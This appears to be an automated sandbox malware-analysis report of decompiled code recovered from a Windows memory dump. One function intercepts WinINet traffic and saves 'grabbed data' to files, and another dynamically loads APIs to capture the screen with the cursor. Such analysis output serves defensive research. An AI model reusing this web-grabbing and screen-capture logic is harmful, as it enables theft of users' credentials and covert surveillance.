    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ca0a7180ccbd02f4f20ed126b8f74e8178922a9c2c9e918b62b614b20be52596
    • Instruction ID: bc4d240c11f007c77c41f88aa4c5b0e29e98c7b78a6deee8ec7153b24fd60b01
    • Opcode Fuzzy Hash: ca0a7180ccbd02f4f20ed126b8f74e8178922a9c2c9e918b62b614b20be52596
    • Instruction Fuzzy Hash: 9CB00175580700AAFE515B10FE1ABA53B69E750B1BF14C171B542E42B0CAA1A9249B18
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 88%
    			E0040B44D(void _a4) {
    				void _v1116;
    				char _v1132;
    				char _v1156;
    				short _v1160;
    				char _v1408;
    				char _v1424;
    				int _v1448;
    				char* _v1452;
    				struct _SYSTEMTIME _v1468;
    				char* _v1476;
    				long _v1484;
    				long _v1488;
    				char _v1496;
    				int _v1520;
    				signed char* _v1548;
    				int _v1552;
    				long _v1556;
    				long _v1564;
    				intOrPtr _v1568;
    				signed int _v1572;
    				struct _GOPHER_FIND_DATAA _v1576;
    				signed short _v1578;
    				signed short* _v1580;
    				signed short _v1582;
    				long _v1584;
    				char _v1588;
    				struct _GOPHER_FIND_DATAA _v1592;
    				char _v1593;
    				intOrPtr _v1600;
    				intOrPtr _v1612;
    				intOrPtr _v1616;
    				intOrPtr _v1624;
    				char _v1633;
    				void* __edi;
    				void* __esi;
    				void* _t254;
    				void _t270;
    				struct _GOPHER_FIND_DATAA _t271;
    				void _t274;
    				signed int _t281;
    				char _t285;
    				signed short* _t291;
    				struct _GOPHER_FIND_DATAA _t292;
    				struct _GOPHER_FIND_DATAA _t295;
    				struct _GOPHER_FIND_DATAA _t298;
    				int _t305;
    				struct _GOPHER_FIND_DATAA _t307;
    				void* _t315;
    				signed int _t320;
    				intOrPtr _t322;
    				signed int _t324;
    				void* _t328;
    				signed short _t352;
    				struct _GOPHER_FIND_DATAA _t375;
    				signed short _t376;
    				void* _t379;
    				struct _GOPHER_FIND_DATAA _t389;
    				struct _GOPHER_FIND_DATAA _t390;
    				struct _GOPHER_FIND_DATAA _t393;
    				long _t397;
    				intOrPtr* _t398;
    				int _t400;
    				long _t405;
    				long _t409;
    				signed char* _t413;
    				char* _t414;
    				struct _GOPHER_FIND_DATAA _t415;
    				struct _GOPHER_FIND_DATAA _t418;
    				void* _t425;
    				struct _GOPHER_FIND_DATAA _t426;
    				struct _GOPHER_FIND_DATAA _t431;
    				struct _GOPHER_FIND_DATAA _t438;
    				char _t462;
    				void _t463;
    				short _t465;
    				void _t474;
    				struct _GOPHER_FIND_DATAA _t478;
    				void* _t480;
    				struct _GOPHER_FIND_DATAA _t489;
    				signed short* _t493;
    				struct _GOPHER_FIND_DATAA _t494;
    				struct _GOPHER_FIND_DATAA _t496;
    				struct _GOPHER_FIND_DATAA _t497;
    				struct _GOPHER_FIND_DATAA _t498;
    				signed int _t499;
    				void* _t501;
    
    				_t501 = (_t499 & 0xfffffff8) - 0x5e4;
    				_t254 =  *_a4;
    				_v1488 = 1;
    				_t409 = 4;
    				if(_t254 == 0 || _t254 == 0xffffffff) {
    					 *(_a4 + 0x40) = RtlAllocateHeap( *0x413e5c, 8, 0x1004);
    					if( *(_a4 + 0x40) != 0) {
    						 *(_a4 + 0x34) = CreateEventW(0, 1, 0, 0);
    						_v1484 = _t409;
    						InternetQueryOptionA( *(_a4 + 8), 0x2d, _a4 + 0x3c,  &_v1484);
    						 *((intOrPtr*)(_a4 + 0x38)) = InternetSetStatusCallback( *(_a4 + 8), E0040B429);
    						InternetSetOptionA( *(_a4 + 8), 0x2d,  &_a4, _t409);
    						goto L5;
    					}
    					goto L3;
    				} else {
    					L5:
    					_t462 = 0x28;
    					E0040CFFE( &_v1484,  &_v1484, 0, _t462);
    					_v1496 = _t462;
    					_v1476 =  *(_a4 + 0x40);
    					while(1) {
    						L6:
    						_t270 = _a4;
    						_v1468.wHour.hwnd = 0x1000;
    						_t271 =  *0x412a44( *((intOrPtr*)(_t270 + 8)),  &_v1484, 8, _t270);
    						__eflags = _t271;
    						if(_t271 != 0) {
    							break;
    						}
    						_t397 = GetLastError();
    						_v1520 = _t397;
    						__eflags = _t397 - 0x3e5;
    						if(_t397 != 0x3e5) {
    							L18:
    							_v1552 = 0;
    							L19:
    							InternetSetOptionA( *(_a4 + 8), 0x2d, _a4 + 0x3c, _t409);
    							_t274 = _a4;
    							__eflags =  *(_t274 + 0x38) - 0xffffffff;
    							if( *(_t274 + 0x38) != 0xffffffff) {
    								_t425 =  *(_t274 + 0x38);
    							} else {
    								_t425 = 0;
    							}
    							InternetSetStatusCallback( *(_t274 + 8), _t425);
    							CloseHandle( *(_a4 + 0x34));
    							__eflags = _v1576;
    							if(_v1576 == 0) {
    								L88:
    								_t463 = _a4;
    								goto L89;
    							} else {
    								_t463 = _a4;
    								_v1593 = 0;
    								_v1568 = 0;
    								__eflags =  *(_t463 + 0x2c);
    								if( *(_t463 + 0x2c) <= 0) {
    									L89:
    									E0040CF40( *(_t463 + 0x40));
    									 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
    									 *0x412dd4(0x412e1c);
    									_t474 = _a4;
    									_t281 = E0040A783( *((intOrPtr*)(_t474 + 8)));
    									__eflags = _t281 - 0xffffffff;
    									if(_t281 != 0xffffffff) {
    										__eflags = _t474 + 4;
    										E0040CF7C(_t281 * 0x30 +  *0x412e10, _t474 + 4, 0x30);
    									}
    									 *0x412dd8(0x412e1c);
    									_t283 = _a4;
    									_t426 =  *_a4;
    									__eflags = _t426;
    									if(_t426 > 0) {
    										__eflags = _t426 - 0xffffffff;
    										if(_t426 != 0xffffffff) {
    											_v1568 = _v1552;
    											_v1572 = _v1584;
    											E0040AFDF( *((intOrPtr*)(_t283 + 8)),  *((intOrPtr*)(_t283 + 0x3c)), 0x64,  &_v1572, 8);
    											_t283 = _a4;
    										}
    									}
    									E0040CF40(_t283);
    									_t285 = _v1588;
    									L95:
    									return _t285;
    								} else {
    									_v1552 = 0;
    									do {
    										_t413 =  *((intOrPtr*)(_t463 + 0x28)) + _v1552;
    										_t431 = _t413[0x14];
    										_v1548 = _t413;
    										__eflags = _t431;
    										if(_t431 == 0) {
    											L29:
    											_t291 = _t413[4];
    											_t433 = _t291 + _t413[8];
    											_v1572 = 0;
    											_v1584 = 0;
    											_v1564 = _t433;
    											__eflags = _t291 - _t433;
    											if(_t291 >= _t433) {
    												L62:
    												__eflags =  *_t413 & 0x00000001;
    												if(( *_t413 & 0x00000001) != 0) {
    													_t478 = _v1572;
    													__eflags = _t478;
    													if(_t478 != 0) {
    														_v1556 = 0xfff;
    														_t324 = InternetQueryOptionA( *(_t463 + 8), 0x22,  *(_t463 + 0x40),  &_v1556);
    														__eflags = _t324;
    														if(_t324 == 0) {
    															_t174 =  &_v1572;
    															 *_t174 = _v1572 & _t324;
    															__eflags =  *_t174;
    															 *( *(_a4 + 0x40)) = 0;
    														}
    														 *((char*)(_v1600 + _t478)) = 0;
    														__eflags =  *_t413 & 0x00000002;
    														if(( *_t413 & 0x00000002) == 0) {
    															_t328 = E0040D379(_v1572,  *(_a4 + 0x40));
    															_push(_t478);
    															E00410EC7(_t433, _t463, __eflags, 0xc9, _t328, 0, L"Grabbed data from: %S\n\n%S",  *(_a4 + 0x40));
    															_t501 = _t501 + 0x18;
    															E0040CF40(_t328);
    														} else {
    															_t465 = 0x3c;
    															E0040CFFE( &(_v1468.wSecond),  &(_v1468.wSecond), 0, _t465);
    															_v1452 =  &_v1408;
    															_v1468.wYear = _t465;
    															_v1448 = 0x103;
    															InternetCrackUrlA( *(_a4 + 0x40), _v1584, 0,  &_v1468);
    															GetSystemTime( &_v1584);
    															wnsprintfW( &_v1160, 0x103, L"grab_%S_%02u_%02u_%02u.bin",  &_v1424, (_v1584 & 0x0000ffff) - 0x7d0, _v1582 & 0x0000ffff, _v1578 & 0x0000ffff);
    															_t501 = _t501 + 0x1c;
    															E00410DB9(_t433, _t465, 3, 0,  &_v1156, _t478, _v1624);
    														}
    														E0040CF40(_t478);
    														_t463 = _a4;
    													}
    												}
    												_t292 = _t413[0xc];
    												__eflags = _t292;
    												if(_t292 != 0) {
    													__eflags =  *_t292;
    													if( *_t292 != 0) {
    														E0040CF40( *0x412e14);
    														_t320 = E0040D0D5(E0040CF40( *0x412e18) | 0xffffffff, _t413[0xc]);
    														 *0x412e14 = _t320;
    														__eflags = _t320 | 0xffffffff;
    														_t322 = E0040D0D5(_t320 | 0xffffffff, _t413[0x10]);
    														_t463 = _a4;
    														 *0x412e18 = _t322;
    													}
    												}
    												__eflags =  *_t413 & 0x00000008;
    												if(( *_t413 & 0x00000008) != 0) {
    													_t415 = _t413[0x10];
    													__eflags = _t415;
    													if(_t415 != 0) {
    														E0040DE73( &_v1484, _t415, E0040D3C6(_t415));
    														GetSystemTime( &_v1468);
    														_push( &_v1468);
    														_push( &_v1496);
    														_push(0);
    														_t315 = 0x10;
    														E004079B5(_t315, __eflags);
    														_t463 = _a4;
    													}
    												}
    												goto L76;
    											} else {
    												goto L30;
    											}
    											while(1) {
    												L30:
    												_t493 = _t291 + ( *_t291 & 0x0000ffff);
    												_t433 = _t493 + ( *_t493 & 0x0000ffff);
    												_v1580 = _t433;
    												__eflags = _t493 - _t433;
    												if(_t493 >= _t433) {
    													goto L62;
    												}
    												_t433 = _v1564;
    												__eflags = _v1580 - _t433;
    												if(_v1580 >= _t433) {
    													goto L62;
    												}
    												_t438 = _t433 | 0xffffffff;
    												_v1588 = 0;
    												_v1592 = _t438;
    												__eflags = _t291[2];
    												if(_t291[2] == 0) {
    													L35:
    													__eflags = _t493[2];
    													if(_t493[2] == 0) {
    														L38:
    														_t352 = _v1580[2] & 0x0000ffff;
    														__eflags = _t352;
    														if(_t352 == 0) {
    															_t480 = 0;
    															__eflags = 0;
    														} else {
    															_t480 = ( *_v1580 & 0x0000ffff) - (_t352 & 0x0000ffff);
    														}
    														__eflags = _t493[2];
    														if(_t493[2] == 0) {
    															_t438 = 0;
    															__eflags = 0;
    															_v1592 = 0;
    														}
    														__eflags =  *_t413 & 0x00000001;
    														if(( *_t413 & 0x00000001) == 0) {
    															_t418 =  *((intOrPtr*)(_t463 + 0x20)) - _t438 + _t480;
    															__eflags = _t418;
    															if(_t418 == 0) {
    																L57:
    																_t413 = _v1548;
    																goto L58;
    															}
    															_t494 = E0040CF2D(_t418);
    															__eflags = _t494;
    															if(_t494 == 0) {
    																_t413 = _v1548;
    																goto L53;
    															}
    															E0040CF7C(_t494,  *(_a4 + 0x1c), _v1588);
    															E0040CF7C(_v1600 + _t494, ( *(_v1592 + 4) & 0x0000ffff) + _v1592, _t480);
    															__eflags = _t494 + _t480 + _v1612;
    															E0040CF7C(_t494 + _t480 + _v1612,  *(_a4 + 0x1c) + _v1616 + _v1612,  *(_a4 + 0x20) - _v1616 - _v1612);
    															E0040CF40( *(_a4 + 0x1c));
    															 *(_a4 + 0x1c) = _t494;
    															 *(_a4 + 0x20) = _t418;
    															_t463 = _a4;
    															_v1633 = 1;
    															goto L57;
    														} else {
    															__eflags = _t438;
    															if(_t438 == 0) {
    																_t438 =  *((intOrPtr*)(_t463 + 0x20)) - _v1588;
    																__eflags = _t438;
    																_v1592 = _t438;
    															}
    															_t433 = _v1584;
    															_t375 = E0040CED8(_t480 + _t438 + _v1584 + 4,  &_v1572);
    															__eflags = _t375;
    															if(_t375 == 0) {
    																_t463 = _a4;
    															} else {
    																_t444 = _v1580;
    																_t376 = _v1580[2] & 0x0000ffff;
    																_t496 = _v1584;
    																__eflags = _t376;
    																if(_t376 > 0) {
    																	E0040CF7C(_v1572 + _t496, (_t376 & 0x0000ffff) + _t444, _t480);
    																	_t496 = _t496 + _t480;
    																	__eflags = _t496;
    																}
    																_t379 = E0040CF7C(_v1572 + _t496,  *(_a4 + 0x1c) + _v1588, _v1592);
    																__eflags =  *_t413 & 0x00000004;
    																if(( *_t413 & 0x00000004) == 0) {
    																	_t497 = _t496 + E00404C56(_t379, _v1592);
    																	__eflags = _t497;
    																} else {
    																	_t497 = _t496 + _v1592;
    																}
    																 *((char*)(_t497 + _v1572)) = 0xa;
    																_t498 = _t497 + 1;
    																__eflags = _t498;
    																_v1584 = _t498;
    																L53:
    																_t463 = _a4;
    																L58:
    																_t433 = _v1580;
    																_t291 = _v1580 + ( *_v1580 & 0x0000ffff);
    																__eflags = _t291 - _v1564;
    																if(_t291 < _v1564) {
    																	continue;
    																}
    															}
    															goto L62;
    														}
    													}
    													_t389 = E00408C0D(_t493 + (_t493[2] & 0x0000ffff), ( *_t493 & 0x0000ffff) - (_t493[2] & 0x0000ffff),  *((intOrPtr*)(_t463 + 0x1c)) + _v1588,  *((intOrPtr*)(_t463 + 0x20)) - _v1588, 0,  &_v1592, 0xb);
    													__eflags = _t389;
    													if(_t389 == 0) {
    														goto L53;
    													} else {
    														_t463 = _a4;
    														_t438 = _v1592;
    														goto L38;
    													}
    												}
    												_t390 = E00408C0D(_t291 + (_t291[2] & 0x0000ffff), ( *_t291 & 0x0000ffff) - (_t291[2] & 0x0000ffff),  *((intOrPtr*)(_t463 + 0x1c)),  *((intOrPtr*)(_t463 + 0x20)),  &_v1588, 0, 0xb);
    												__eflags = _t390;
    												if(_t390 == 0) {
    													goto L53;
    												} else {
    													_t463 = _a4;
    													_t438 = _v1592;
    													goto L35;
    												}
    											}
    											goto L62;
    										}
    										__eflags =  *_t431 - 0x2a;
    										if( *_t431 != 0x2a) {
    											L28:
    											_t295 = E00408C0D(_t431, E0040D3C6(_t431),  *((intOrPtr*)(_t463 + 0x1c)),  *((intOrPtr*)(_t463 + 0x20)), 0, 0, 8);
    											_t463 = _a4;
    											__eflags = _t295;
    											if(_t295 == 0) {
    												goto L76;
    											}
    											goto L29;
    										}
    										__eflags =  *((char*)(_t431 + 1));
    										if( *((char*)(_t431 + 1)) == 0) {
    											goto L29;
    										}
    										goto L28;
    										L76:
    										_v1568 = _v1568 + 1;
    										_v1552 = _v1552 + 0x18;
    										__eflags = _v1568 -  *(_t463 + 0x2c);
    									} while (_v1568 <  *(_t463 + 0x2c));
    									__eflags = _v1593;
    									if(_v1593 == 0) {
    										goto L89;
    									}
    									_v1564 = 0x400;
    									_t298 = InternetQueryOptionA( *(_t463 + 8), 0x22,  &_v1116,  &_v1564);
    									__eflags = _t298;
    									if(_t298 != 0) {
    										_t299 = _v1580;
    										__eflags = _v1580 - 8;
    										if(_v1580 > 8) {
    											_t414 = E0040D379(_t299,  &_v1132);
    											__eflags = _t414;
    											if(_t414 != 0) {
    												_v1584 = 0x1000;
    												_t489 = E0040CF2D(0x1000);
    												__eflags = _t489;
    												if(_t489 != 0) {
    													 *_t489 = 0x50;
    													_t305 = GetUrlCacheEntryInfoW(_t414, _t489,  &_v1584);
    													__eflags = _t305;
    													if(_t305 != 0) {
    														_t307 =  *(_t489 + 8);
    														__eflags = _t307;
    														if(_t307 != 0) {
    															__eflags =  *_t307;
    															if( *_t307 != 0) {
    																E0040DB9E( *(_a4 + 0x20), _t307,  *(_a4 + 0x1c));
    															}
    														}
    													}
    													E0040CF40(_t489);
    												}
    												E0040CF40(_t414);
    											}
    										}
    									}
    									goto L88;
    								}
    							}
    						}
    						_t398 = _a4;
    						__eflags =  *_t398 - 0xffffffff;
    						if( *_t398 == 0xffffffff) {
    							L11:
    							_t400 = PeekMessageW( &(_v1468.wHour), 0, 0, 0, 1);
    							__eflags = _t400;
    							if(_t400 != 0) {
    								DispatchMessageW( &(_v1468.wHour));
    								goto L11;
    							}
    							_t405 = MsgWaitForMultipleObjects(1, _a4 + 0x34, 0, 0xffffffff, 0x4bf);
    							__eflags = _t405;
    							if(_t405 != 0) {
    								goto L11;
    							} else {
    								ResetEvent( *(_a4 + 0x34));
    								continue;
    							}
    						} else {
    							 *_t398 =  *_t398 + 1;
    							L3:
    							_t285 = 0;
    							goto L95;
    						}
    					}
    					_v1520 = 0;
    					__eflags = _v1476;
    					if(_v1476 == 0) {
    						goto L19;
    					}
    					_t393 = E0040CEF9( &(_v1476[ *(_a4 + 0x20)]),  *(_a4 + 0x1c));
    					__eflags = _t393;
    					if(_t393 == 0) {
    						_v1520 = 8;
    						goto L18;
    					} else {
    						 *(_a4 + 0x1c) = _t393;
    						E0040CF7C( *(_a4 + 0x20) +  *(_a4 + 0x1c),  *(_a4 + 0x40), _v1476);
    						 *(_a4 + 0x20) =  *(_a4 + 0x20) + _v1488;
    						goto L6;
    					}
    				}
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,00001004), ref: 0040B483
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040B4A2
    • InternetQueryOptionA.WININET(?,0000002D,?,?), ref: 0040B4C3
    • InternetSetStatusCallback.WININET(?,0040B429), ref: 0040B4D4
    • InternetSetOptionA.WININET(?,0000002D,?,00000004), ref: 0040B4ED
    • InternetReadFileExA.WININET(?), ref: 0040B526
    • GetLastError.KERNEL32 ref: 0040B530
    • DispatchMessageW.USER32(?), ref: 0040B55C
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040B56E
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040B588
    • ResetEvent.KERNEL32(?), ref: 0040B598
    • InternetSetOptionA.WININET(?,0000002D,?,00000004), ref: 0040B607
    • InternetSetStatusCallback.WININET(?,000000FF), ref: 0040B621
    • CloseHandle.KERNEL32(?), ref: 0040B62D
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040B8FF
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040B96F
    • GetSystemTime.KERNEL32(?), ref: 0040B97A
    • GetSystemTime.KERNEL32(?,?,?,00000000), ref: 0040BA79
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040BAD7
    • GetUrlCacheEntryInfoW.WININET(00000000,00000000,00000000), ref: 0040BB1E
    • wnsprintfW.SHLWAPI ref: 0040B9AD
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
      • Part of subcall function 0040DE73: CryptAcquireContextW.ADVAPI32(0040FCF8,00000000,00000000,00000001,F0000040,?,0040FCF8,00000000,?,-0000001C,00000000,?,?,?), ref: 0040DE8C
      • Part of subcall function 0040DE73: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 0040DEA4
      • Part of subcall function 0040DE73: CryptHashData.ADVAPI32(?,00000010), ref: 0040DEBF
      • Part of subcall function 0040DE73: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040DED6
      • Part of subcall function 0040DE73: CryptDestroyHash.ADVAPI32(?), ref: 0040DEED
      • Part of subcall function 0040DE73: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040DEF7
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040BB68
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040BB94
    Strings
    • grab_%S_%02u_%02u_%02u.bin, xrefs: 0040B99F
    • Grabbed data from: %S%S, xrefs: 0040B9E6
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$Crypt$Option$Hash$Query$CallbackContextCreateCriticalEventHeapMessageSectionStatusSystemTime$AcquireAllocateCacheCloseCrackDataDestroyDispatchEnterEntryErrorFileFreeHandleInfoLastLeaveMultipleObjectsParamPeekReadReleaseResetWaitwnsprintf
    • String ID: Grabbed data from: %S%S$grab_%S_%02u_%02u_%02u.bin
    • API String ID: 229834109-2564430838
    • Opcode ID: 38d126545ea893dc68775dbb5c2f977284525d8fb094606420f00977bbc5ff8a
    • Instruction ID: 28d41342af25e4f4df2e4e36875addbdafe44f0483dbb9bf93b1f01ef23687ff
    • Opcode Fuzzy Hash: 38d126545ea893dc68775dbb5c2f977284525d8fb094606420f00977bbc5ff8a
    • Instruction Fuzzy Hash: DE32AE71604301AFC714DF24C884EAB7BE9FF88354F04856EF989AB2A1D774D941CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E00407D61(WCHAR* _a4, char _a8, signed int _a12) {
    				void* _v12;
    				WCHAR** _v16;
    				void* _v20;
    				void* _v24;
    				_Unknown_base(*)()* _v28;
    				struct HDC__* _v32;
    				struct tagPOINT _v40;
    				_Unknown_base(*)()* _v44;
    				intOrPtr _v48;
    				_Unknown_base(*)()* _v52;
    				_Unknown_base(*)()* _v56;
    				_Unknown_base(*)()* _v60;
    				_Unknown_base(*)()* _v64;
    				_Unknown_base(*)()* _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				_Unknown_base(*)()* _v80;
    				_Unknown_base(*)()* _v84;
    				char _v88;
    				_Unknown_base(*)()* _v92;
    				intOrPtr _v96;
    				char _v124;
    				signed int _v128;
    				struct HINSTANCE__* _v132;
    				struct HINSTANCE__* _v136;
    				struct HINSTANCE__* _v140;
    				char _v144;
    				struct _ICONINFO _v164;
    				char _v180;
    				intOrPtr _t159;
    				intOrPtr _t161;
    				intOrPtr _t163;
    				intOrPtr _t165;
    				intOrPtr _t167;
    				intOrPtr _t169;
    				intOrPtr _t171;
    				intOrPtr _t173;
    				_Unknown_base(*)()* _t174;
    				intOrPtr _t176;
    				intOrPtr _t178;
    				_Unknown_base(*)()* _t179;
    				intOrPtr _t180;
    				intOrPtr _t182;
    				intOrPtr _t184;
    				intOrPtr _t186;
    				intOrPtr _t188;
    				intOrPtr _t190;
    				intOrPtr _t192;
    				intOrPtr _t194;
    				intOrPtr _t196;
    				_Unknown_base(*)()* _t197;
    				intOrPtr _t202;
    				struct HICON__* _t205;
    				signed int _t209;
    				intOrPtr _t211;
    				void* _t216;
    				void* _t239;
    				intOrPtr* _t240;
    				intOrPtr* _t258;
    				intOrPtr _t259;
    				signed int _t260;
    				void* _t261;
    				void* _t263;
    				unsigned int _t270;
    				struct HINSTANCE__* _t271;
    				struct HINSTANCE__* _t272;
    				struct HINSTANCE__* _t273;
    				signed int _t274;
    				signed int _t275;
    				void* _t281;
    
    				_t159 =  *0x412a64; // 0x246f5a8
    				_t271 = LoadLibraryA( *(_t159 + 0x80));
    				_t161 =  *0x412a64; // 0x246f5a8
    				_v28 = GetProcAddress(_t271,  *(_t161 + 0x90));
    				_t163 =  *0x412a64; // 0x246f5a8
    				_v72 = GetProcAddress(_t271,  *(_t163 + 0x94));
    				_t165 =  *0x412a64; // 0x246f5a8
    				_v68 = GetProcAddress(_t271,  *(_t165 + 0x98));
    				_t167 =  *0x412a64; // 0x246f5a8
    				_v76 = GetProcAddress(_t271,  *(_t167 + 0x9c));
    				_t169 =  *0x412a64; // 0x246f5a8
    				_v80 = GetProcAddress(_t271,  *(_t169 + 0xa0));
    				_t171 =  *0x412a64; // 0x246f5a8
    				_v60 = GetProcAddress(_t271,  *(_t171 + 0xa4));
    				_t173 =  *0x412a64; // 0x246f5a8
    				_t174 = GetProcAddress(_t271,  *(_t173 + 0xa8));
    				_v92 = _t174;
    				if(_t271 == 0 || _v28 == 0 || _v72 == 0 || _v68 == 0 || _v76 == 0 || _v80 == 0 || _v60 == 0 || _t174 == 0) {
    					L52:
    					return 0;
    				} else {
    					_t176 =  *0x412a64; // 0x246f5a8
    					_t272 = LoadLibraryA( *(_t176 + 0x84));
    					_t178 =  *0x412a64; // 0x246f5a8
    					_t179 = GetProcAddress(_t272,  *(_t178 + 0xac));
    					_v84 = _t179;
    					if(_t272 == 0 || _t179 == 0) {
    						goto L52;
    					} else {
    						_t180 =  *0x412a64; // 0x246f5a8
    						_t273 = LoadLibraryA( *(_t180 + 0x88));
    						_t182 =  *0x412a64; // 0x246f5a8
    						_t258 = GetProcAddress(_t273,  *(_t182 + 0xb0));
    						_t184 =  *0x412a64; // 0x246f5a8
    						_v16 = GetProcAddress(_t273,  *(_t184 + 0xb4));
    						_t186 =  *0x412a64; // 0x246f5a8
    						_v12 = GetProcAddress(_t273,  *(_t186 + 0xb8));
    						_t188 =  *0x412a64; // 0x246f5a8
    						_v20 = GetProcAddress(_t273,  *(_t188 + 0xbc));
    						_t190 =  *0x412a64; // 0x246f5a8
    						_v44 = GetProcAddress(_t273,  *(_t190 + 0xc0));
    						_t192 =  *0x412a64; // 0x246f5a8
    						_v52 = GetProcAddress(_t273,  *(_t192 + 0xc4));
    						_t194 =  *0x412a64; // 0x246f5a8
    						_v56 = GetProcAddress(_t273,  *(_t194 + 0xc8));
    						_t196 =  *0x412a64; // 0x246f5a8
    						_t197 = GetProcAddress(_t273,  *(_t196 + 0xcc));
    						_v64 = _t197;
    						if(_t273 == 0 || _t258 == 0 || _v16 == 0 || _v12 == 0 || _v20 == 0 || _v44 == 0 || _v52 == 0 || _v56 == 0 || _t197 == 0) {
    							goto L52;
    						} else {
    							_v24 = 0;
    							_v144 = 1;
    							_v140 = 0;
    							_v136 = 0;
    							_v132 = 0;
    							if(_a12 != 0 || E00409EE6() != 0) {
    								_push(0);
    								_push( &_v144);
    								_push( &_v88);
    								if(_v28() != 0) {
    									goto L51;
    								}
    								_t202 =  *0x412a64; // 0x246f5a8
    								_t259 =  *_t258( *((intOrPtr*)(_t202 + 0x8c)), 0, 0, 0);
    								_v28 = _t259;
    								_v32 = _v16(_t259);
    								_v40.y = 0;
    								_v40.x = 0;
    								_t205 = LoadCursorW(0, 0x7f00);
    								_v16 = _t205;
    								GetIconInfo(_t205,  &_v164);
    								GetCursorPos( &_v40);
    								if(_a12 == 0) {
    									_t209 = _v12(_t259, 8);
    									_t274 = _t209;
    									_t260 = _v12(_t259, 0xa);
    								} else {
    									_t274 = _a12 & 0x0000ffff;
    									_t260 = _t274;
    								}
    								_t211 = _v20(_v28, _t274, _t260);
    								_v48 = _t211;
    								if(_t211 == 0) {
    									L50:
    									_t152 =  &_v32; // 0x40570a
    									_v64( *_t152);
    									_v64(_v28);
    									_v72(_v88);
    									goto L51;
    								} else {
    									_t72 =  &_v32; // 0x40570a
    									_v96 = _v44( *_t72, _t211);
    									_t216 = 0;
    									_t263 = 0;
    									if(_a12 != 0) {
    										_t270 = (_a12 & 0x0000ffff) >> 1;
    										_t216 = _v40.x - _t270;
    										_v40.x = _v40.x - _t216;
    										_t263 = _v40.y - _t270;
    										_v40.y = _v40.y - _t263;
    									}
    									_v52(_v32, 0, 0, _t274, _t260, _v28, _t216, _t263, 0x40cc0020);
    									DrawIcon(_v32, _v40.x - _v164.xHotspot, _v40.y - _v164.yHotspot, _v16);
    									_push( &_v12);
    									_push(0);
    									_push(_v48);
    									_v12 = 0;
    									if(_v68() != 0 || _v12 == 0) {
    										L49:
    										_v44(_v32, _v96);
    										_v56(_v48);
    										goto L50;
    									} else {
    										_push( &_v20);
    										_push( &_a12);
    										_a12 = 0;
    										_v20 = 0;
    										if(_v80() != 0) {
    											L48:
    											_v76(_v12);
    											goto L49;
    										}
    										_t231 = _v20;
    										if(_v20 == 0 || _a12 == 0) {
    											goto L48;
    										} else {
    											_t261 = E0040CF2D(_t231);
    											if(_t261 == 0) {
    												goto L48;
    											}
    											_v60(_a12, _v20, _t261);
    											_t275 = 0;
    											if(_a12 <= 0) {
    												L40:
    												E0040CF40(_t261);
    												if(_v20 == 0) {
    													_push( &_v24);
    													_push(1);
    													_push(0);
    													if(_v84() == 0 && _v24 != 0) {
    														_v128 = 0;
    														if(_a8 > 0) {
    															E0040CF7C( &_v124, 0x4019e8, 0x10);
    															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x64)) = 4;
    															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x68)) = 1;
    															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x60)) =  &_a8;
    															_v128 = _v128 + 1;
    														}
    														_t239 = _v92(_v12, _v24,  &_v180,  &_v128);
    														_t240 = _v24;
    														if(_t239 == 0) {
    															 *((intOrPtr*)( *_t240 + 0x14))(_t240, 0, 0, 0, 0);
    														} else {
    															 *((intOrPtr*)( *_t240 + 8))(_t240);
    															_v24 = 0;
    														}
    													}
    												}
    												goto L48;
    											}
    											_t108 = _t261 + 0x30; // 0x30
    											_v16 = _t108;
    											while(lstrcmpiW(_a4,  *_v16) != 0) {
    												_v16 = _v16 + 0x4c;
    												_t275 = _t275 + 1;
    												if(_t275 < _a12) {
    													continue;
    												}
    												goto L40;
    											}
    											E0040CF7C( &_v180, _t275 * 0x4c + _t261, 0x10);
    											_v20 = 0;
    											goto L40;
    										}
    									}
    								}
    							} else {
    								L51:
    								return _v24;
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 00407D78
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407D8C
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DA1
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DB6
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DCB
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DE0
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407DF5
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407E0A
    • LoadLibraryA.KERNELBASE(?), ref: 00407E66
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407E7A
    • LoadLibraryA.KERNELBASE(?), ref: 00407E9E
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EB2
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EC6
    • GetProcAddress.KERNELBASE(00000000,?), ref: 00407EDB
